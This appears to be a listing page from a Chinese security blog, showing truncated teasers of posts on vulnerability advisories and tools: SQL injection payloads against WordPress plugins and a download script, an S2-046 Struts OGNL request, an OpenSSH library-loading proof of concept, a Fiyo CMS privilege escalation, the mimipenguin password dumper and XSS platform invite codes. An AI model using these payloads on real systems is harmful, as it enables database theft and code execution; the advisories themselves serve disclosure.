• Xss测试平台邀请码[12月4日更新]

    Xss测试平台邀请码[12月4日更新]
    Links:http://xss.re/ 2015年11月30日 23:20 重新开启 邀请码: d0bee52a6dd0f7a770d109cffa31a49d a49fd8767a827b5d9c6075d0cc6e3e91 eb00f5a5c36d03055c7807c7c716fb24 5d85d80499b324c6596b501265a43ea6 e31b55764ce905cd3aa17734b1898509 16943fffcecd1759e3314df762aa215a accde626f685af525164571219d197dc c87c11639bd4170b9863392f4787682d ff169ce65b6006269b817a...
    作者:unhonker| 发布:2013年1月08日 | 分类:个人关注 | 被撸:75,855次| 标签:
  • WordPress Huge-IT Video Gallery 2.0.4 SQL注入较新的文章

    WordPress Huge-IT Video Gallery 2.0.4 SQL注入
    Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEE...
    作者:unhonker| 发布:2017年5月30日 | 分类:漏洞公布 | 被撸:14次| 标签:
  • WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

    WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability
    1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter ‘kc_ad’ is vulnerable. 2. Proof of concept sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""...
    作者:unhonker| 发布:2017年4月26日 | 分类:漏洞公布 | 被撸:413次| 标签:
  • Linux下密码抓取神器mimipenguin

    Linux下密码抓取神器mimipenguin
    下载地址:https://github.com/huntergregal/mimipenguin 需要root权限。 以下环境测试通过 Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2) VSFTPd 3.0.3-8+b1 (Active FTP client connections...
    作者:unhonker| 发布:2017年4月06日 | 分类:个人关注 | 被撸:445次| 标签:
  • S2-046 PoC

    S2-046 PoC
    POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ------WebKitFormBoundaryAnmUgTEhFhOZpr9z Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatche...
    作者:unhonker| 发布:2017年3月21日 | 分类:漏洞公布 | 被撸:789次| 标签:
  • Fiyo CMS 2.0.6.1 权限提升漏洞

    Fiyo CMS 2.0.6.1 权限提升漏洞
    # Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksya, @dvnrcy # Vendor Homepage: http://www.fiyo.org # Software Link: https://sourceforge.net/projects/fiyo-cms # Version: 2.0.6.1 # Tested on: Windows Server 2012 Datacent...
    作者:unhonker| 发布:2017年3月13日 | 分类:漏洞公布 | 被撸:574次| 标签:
  • st2-045测试工具

    st2-045测试工具
    相信有不少运维朋友又要加班加点的打补丁了。 本工具仅用作探测自有资产是否存在该漏洞,请勿用于其他用途,否则后果自负。 测试工具: st2-045ihonker专版 修复意见: 升级st2框架
    作者:unhonker| 发布:2017年3月07日 | 分类:漏洞公布 | 被撸:1,619次| 标签:
  • MySQL文件上传-ID参数SQL注入

    MySQL文件上传-ID参数SQL注入
    SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+...
    作者:unhonker| 发布:2017年2月08日 | 分类:漏洞公布 | 被撸:890次|
  • OpenSSH 7.4代理协议任意库加载漏洞

    OpenSSH 7.4代理协议任意库加载漏洞
    CVE-2016-10009 $ cat evil_lib.c #include <stdlib.h> __attribute__((constructor)) static void run(void) { // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, // prevent recursion through system() unsetenv("LD_PRELOAD"); unsetenv("LD_LIBRARY_PATH"); system("id > /tmp/test"); ...
    作者:unhonker| 发布:2016年12月25日 | 分类:漏洞公布 | 被撸:1,076次| 标签:
  • burpsuite V1.7.11

    burpsuite V1.7.11
    之前的版本貌似都集体失效了,这个版本是目前可以用的,刚测试了下。 下载地址: Burp v1.7
    作者:unhonker| 发布:2016年12月05日 | 分类:个人关注 | 被撸:1,236次| 标签: